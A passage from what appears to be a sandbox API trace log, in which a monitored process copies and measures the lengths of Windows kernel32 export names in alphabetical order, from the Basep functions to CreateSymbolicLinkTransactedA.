(lpString="BASEPCHECKAPPCOMPAT") returned 19 [0085.584] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0085.584] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0085.584] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0085.585] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0085.585] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0085.585] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0085.585] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0085.585] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0085.585] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0085.585] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0085.585] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0085.585] lstrlenA (lpString="BEEP") returned 4 [0085.585] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0085.585] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0085.585] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0085.585] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0085.585] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0085.585] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0085.585] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0085.585] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0085.585] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0085.585] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0085.585] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0085.585] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0085.585] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0085.585] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0085.585] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0085.585] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0085.585] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0085.585] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0085.585] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0085.585] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0085.585] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0085.585] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0085.585] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0085.585] lstrlenA (lpString="CANCELIO") returned 8 [0085.585] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0085.585] lstrlenA (lpString="CANCELIOEX") returned 10 [0085.585] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0085.585] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0085.586] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0085.586] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0085.586] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0085.586] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0085.586] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0085.586] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0085.586] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0085.586] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0085.586] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0085.586] lstrlenA (lpString="CHECKELEVATION") returned 14 [0085.586] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0085.586] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0085.586] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0085.586] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0085.586] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0085.586] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0085.586] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0085.586] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0085.586] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0085.586] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0085.586] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0085.586] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0085.586] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0085.586] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0085.586] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0085.586] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0085.586] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0085.586] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0085.586] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0085.586] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0085.586] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0085.586] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0085.586] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0085.586] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0085.586] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0085.586] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0085.586] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0085.586] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0085.587] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0085.587] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0085.587] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0085.587] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0085.587] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0085.587] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0085.587] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0085.587] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0085.587] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0085.587] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0085.587] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0085.587] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0085.587] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0085.587] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0085.587] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0085.587] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0085.587] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0085.587] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0085.587] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0085.587] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0085.587] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0085.587] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0085.587] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0085.587] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0085.587] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0085.587] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0085.587] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0085.587] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0085.587] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0085.587] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0085.587] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0085.587] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0085.587] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0085.587] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0085.587] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0085.587] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0085.587] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0085.588] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0085.588] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0085.588] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0085.588] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0085.588] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0085.588] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0085.588] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0085.588] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0085.588] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0085.588] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0085.588] lstrlenA (lpString="COPYCONTEXT") returned 11 [0085.588] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0085.588] lstrlenA (lpString="COPYFILEA") returned 9 [0085.588] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0085.588] lstrlenA (lpString="COPYFILEEXA") returned 11 [0085.588] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0085.588] lstrlenA (lpString="COPYFILEEXW") returned 11 [0085.588] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0085.588] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0085.588] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0085.588] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0085.588] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0085.588] lstrlenA (lpString="COPYFILEW") returned 9 [0085.588] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0085.588] lstrlenA (lpString="COPYLZFILE") returned 10 [0085.588] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0085.588] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0085.588] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0085.588] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0085.588] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0085.588] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0085.588] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0085.588] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0085.588] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0085.588] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0085.588] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0085.588] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0085.589] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0085.589] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0085.589] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0085.589] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0085.589] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0085.589] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0085.589] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0085.589] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0085.589] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0085.589] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0085.589] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0085.589] lstrlenA (lpString="CREATEEVENTA") returned 12 [0085.589] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0085.589] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0085.589] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0085.589] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0085.589] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0085.589] lstrlenA (lpString="CREATEEVENTW") returned 12 [0085.589] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0085.589] lstrlenA (lpString="CREATEFIBER") returned 11 [0085.589] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0085.589] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0085.589] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0085.589] lstrlenA (lpString="CREATEFILEA") returned 11 [0085.589] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0085.589] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0085.589] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0085.589] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0085.589] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0085.589] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0085.589] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0085.589] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0085.589] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0085.589] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0085.589] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0085.589] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0085.589] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0085.589] lstrlenA (lpString="CREATEFILEW") returned 11 [0085.590] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0085.590] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0085.590] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0085.590] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0085.590] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0085.590] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0085.590] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0085.590] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0085.590] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0085.590] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0085.590] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0085.590] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0085.590] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0085.590] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0085.590] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0085.590] lstrlenA (lpString="CREATEJOBSET") returned 12 [0085.590] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0085.590] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0085.590] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0085.590] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0085.590] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0085.590] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0085.590] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0085.590] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0085.590] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0085.590] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0085.590] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0085.590] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0085.590] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0085.590] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0085.590] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0085.590] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0085.590] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0085.590] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0085.590] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0085.590] lstrlenA (lpString="CREATEPIPE") returned 10 [0085.590] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0085.591] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0085.591] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0085.591] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0085.591] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0085.591] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0085.591] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0085.591] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0085.591] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0085.591] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0085.591] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0085.591] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0085.591] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0085.591] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0085.591] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0085.591] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0085.591] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0085.591] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0085.591] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0085.591] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0085.591] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0085.591] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0085.591] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0085.591] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0085.591] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0085.591] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0085.591] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0085.591] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0085.591] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0085.591] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0085.591] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0085.591] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0085.591] lstrcpyA 